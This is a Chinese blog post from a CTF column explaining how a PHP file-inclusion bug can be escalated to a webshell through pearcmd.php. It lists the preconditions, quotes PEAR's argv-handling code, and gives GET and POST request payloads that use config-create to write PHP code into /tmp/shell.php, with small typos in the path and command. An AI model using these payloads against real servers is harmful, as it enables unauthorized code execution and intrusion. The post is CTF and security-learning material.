Pearcmd.php

最新推荐文章于 2024-07-03 09:45:58 发布
最新推荐文章于 2024-07-03 09:45:58 发布
阅读量377 收藏 7
点赞数 10
分类专栏: CTF 文章标签: php 开发语言 web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/The_Epiphany/article/details/137026845
版权

来自P神的文章[[https://www.leavesongs.com/PENETRATION/docker-php-include-getshell.html]]
一.pearcmd.php
pecl是PHP中用于管理扩展而使用的命令行工具,而pear是pecl依赖的类库。在7.3及以前pecl/pear是默认安装的;在7.4及以后,需要我们在编译PHP的时候指定--with-pear才会安装。
不过,在*DOCKER*(一个开源的应用容器引擎)任意版本镜像中,pcel/pear都会被默认安装,默认路径==`/usr/local/lib/php/pearcmd.php`==。
二.利用条件
1.肯定是要安装了pear,不然没有pearcmd.php。
2.我们要知道pearcmd.php的路径,因为实质上我们是想要先去包含pearcmd.php文件,进而实现pear命令调用,然后写入恶意文件。
3.`register_argc_argv`处于开启状态,只有这样我们才能够将所要执行的命令参数传递,后面细写。
三.利用分析
实现pear利用函数

public static function readPHPArgv()
{
    global $argv;
    if (!is_array($argv)) {//先看arrgv是否存在
        if (!@is_array($_SERVER['argv'])) {//不存在去找$_SERVER['argv']
            if (!@is_array($GLOBALS['HTTP_SERVER_VARS']['argv'])) {
                $msg = "Could not read cmd args (register_argc_argv=Off?)";
                return PEAR::raiseError("Console_Getopt: " . $msg);
            }
            return $GLOBALS['HTTP_SERVER_VARS']['argv'];
        }
        return $_SERVER['argv'];
    }
    return $argv;
}


在P神的文章中提到了==`SG(request_info).query_string`==这段代码,其会将query-string中的值赋给argv,实际上是将?后的值给argv。
也就是说在WEB中argv会接受?后的值,然后执行pear命令行功能。
如果还是不能理解怎么赋值可以看这篇文章:https://www.cnblogs.com/weijia-home/p/15141681.html
PS:pear本身是一个sh程序
四.构造payload
先理一下总体思路:
首先通过包含pearcmd.php文件,然后利用$_SERVER['argv']来调用pear命令。
其中值得注意的是,构造中命令用+连接(~~其实就是空格~~)

pear命令中我们可以用config-creat创建文件,第一个参数为内容,第二个参数为写入文件路径

```
GET /index.php?file=/user/local/lib/php/pearcmd.php/&+config-creat+/&/<?=phpinfo()?>+/tmp/shell.php


POST /index.php?+config-create+/&/<?=phpinfo()?>+/tmp/shell.php HTTP/1.1
file=/user/local/lib/php/pearcmd.php

```

最终我们将恶意代码插入到了/tmp/shell.php中,最后包含/tmp/shell.php文件即可
或者也可以写到/var/www/html/shell.php,直接访问页面就可以了。

The_Epiphany
关注
  • 10
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[HXBCTF 2021]easywill writeup(WillPHP源码审计+利用pearcmd.php文件包含getshell)
ShenZ的博客
04-18 677
[HXBCTF 2021]easywill [HXBCTF 2021]easywill 1.WillPHP源码审计 2.利用pearcmd.php文件包含getshell assign函数 看willphp\wiphp\View.php 最终到renderTo方法时$_vars数组的值是我们index.php中传入的$_vars[name]=value 我们只需要让name为cfile,extact变量覆盖掉下面include的$cfile,即可进行任意文件包含
Windows下的PHP安装pear教程
01-20
因为需要安装 PHPUnit,要先装 pear,网上的教程大多数是以双击 go-pear.bat 开始,但是我安装的php文件夹里压根没有这个文件。 经过几次搜索之后终于找到了办法,解决步骤如下: 1、下载下面连接的文件至 go-pear....
CTF中的pearcmd.php文件包含
XINO
09-27 1011
还是太菜了,当初看羊城杯的这个题目时完全没有想到可以用这个方法来做,还是做题太少了啊。
pearcmd】通过pearcmd.php 进行GetShell
最新发布
SwBack的博客
07-03 430
通过pearcmd.php进行文件包含.从而getshell
利用pearcmd.php文件包含拿shell(LFI)
m0_62422842的博客
09-08 2536
最近看博客的时候遇到有师傅总结了一个新颖的文件包含思路,通过pearcmd.php来进行本地文件包含来拿shell,我感觉还挺有意思的,就花时间来学习了一下。
利用pearcmd.php本地文件包含(LFI)
Mrs_H的博客
01-08 5879
利用pearcmd.php本地文件包含(LFI) 一.前言 pearcmd这个东西很久以前就已经复现过了,但是当时没有记录下来。这些天在整理之前比赛的wp的时候突然看见了pear的LFI到getshell,就突然想起来自己应该是利用过了的。但是怎么找也找不到之前的笔记,于是就有了再复现一遍的想法。 二.正文 1.环境的准备 这里的话我使用的是docker来搭建的一个lamp,然后在这个lamp上面进行后续的漏洞复现。至于为什么这么做呢?照P神的话来说就是因为在Docker任意版本的镜像中pear都会被默认安
利用pearcmd.php和文件包含getshell
m0_59053674的博客
04-23 1339
文章介绍如何利用pearcmd来getshel,并对payload的构造格式提出了一点想法
jsj_PHPpear的安装和使用.pdf
10-10
2. **配置 PEAR 的路径**:修改 `php.ini` 文件中的 `include_path` 设置,添加 PEAR 的路径。对于 Windows 系统,路径格式如下: ```ini ; Windows: "\path1;\path2" ;include_path = ".;c:\php\includes" ...
PHP使用 Pear 进行安装和卸载包的方法详解
10-16
主要介绍了PHP使用 Pear 进行安装和卸载包的方法,结合实例形式详细分析了php使用 Pear 安装及卸载扩展包的相关操作命令与使用技巧,需要的朋友可以参考下
PHP5.4.3下安装PEAR&PHPUnit;&phpDoc2;
08-27
打开命令提示符(CMD),并切换到 PHP 安装目录,执行以下命令来安装 PEAR: ```bash php go-pear.phar ``` 此命令会引导您完成整个安装过程,包括设置配置文件等步骤。 3. **验证安装** 安装完成后,可以...
pearcmd.php文件包含妙用
leekos的博客,分享web安全相关知识~
07-24 1395
PHP中用于管理扩展而使用的命令行工具,而pear是pecl依赖的类库。在7.4及以后,需要我们在编译PHP的时候指定。这样我们就可以从远程服务器上下载shell到靶机上了,使用文件包含注意将路径url编码。不过,在Docker任意版本镜像中,pcel/pear都会被默认安装,安装的路径在。必须传入两个参数,第一个参数传入绝对路径,第二个参数传入想要保存的文件名。运行,如果存在文件包含漏洞,就可以运行这个命令行工具。此处我们传入的第一个参数不是一个绝对路径,所以不行。这样,在文件包含下,我们就可以运行。
利用 pearcmd.php 实现 Getshell
1tachi的博客
01-12 625
文章目录源码分析利用Pearcmd.php 学习连接:西湖论剑的一道Web 源码 <?php highlight_file(__FILE__); if(isset($_GET['check'])){ if(file_get_contents($_GET['check']) === "LFI"){ @include($_GET['a']); }else{ die("no!"); } } 分析 信息搜集了一圈,啥也没有,也就是说不知
pearcmd.php的妙用
Sk1y的博客
12-20 3382
pearcmd.php的妙用 文章目录pearcmd.php的妙用1. register_argc_argvcli模式下WEB模式中简单的利用2. pearcmd.php的神奇使用3. register_argc_argv和pear的关系4. payload靶机可出网靶机不可出网时参考链接 1. register_argc_argv 如果环境中含有php.ini,则默认register_argc_argv=Off;如果环境中没有php.ini,则默认register_argc_argv=On 这个regis
初始认识pearcmd.php
m0_62706061的博客
11-17 599
初始pearcmd.php
浅谈文件包含之包含pearcmd.php漏洞
JCPS_Y的博客
10-26 3538
浅谈一下文件包含之包含pearcmd.php漏洞
pearcmd文件包含漏洞
Elite的博客
01-20 1528
pecl是PHP中用于管理扩展而使用的命令行工具,而pear是pecl依赖的类库
nginx 中 PHP 调用PEAR.php遇到的问题
weixin_34240657的博客
08-13 176
公司有个老项目,写了很多年了,是在apache 上面跑的,无意间,我想让它跑到nginx上,结果遇到了PEAR.php的问题,先安装pear 基本安富有就是 wget http://pear.php.net/go-pear.pharphp go-pear.phar 我php版本是5.4的,先禁用disable_functions 这个要不然安装不成功 安装上了以后,就调报是报了这个错 p...
php中PECL和PEAR的关系
书山路遥
12-29 1910
php中有两个概念:PEAR和PECL。这两个概念关系紧密,却又有着本质的区别。今天就试着把它们的关系讲讲清楚。 基本概念 PEAR的概念原文如下: PEAR(PHP Extension and Application Repository) is a framework and distribution system for reusable PHP components. 我的理解是:...
快速入门:PEAR PHP开发基础与安装指南
而在Windows环境下,由于安装方式不同,需要手动执行go-pear.bat脚本来完成安装。 第二部分则聚焦于PEAR_Error,它是当开发者使用Pear包添加异常处理时会遇到的工具。通过了解和使用这个包,可以帮助应用程序更好地...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值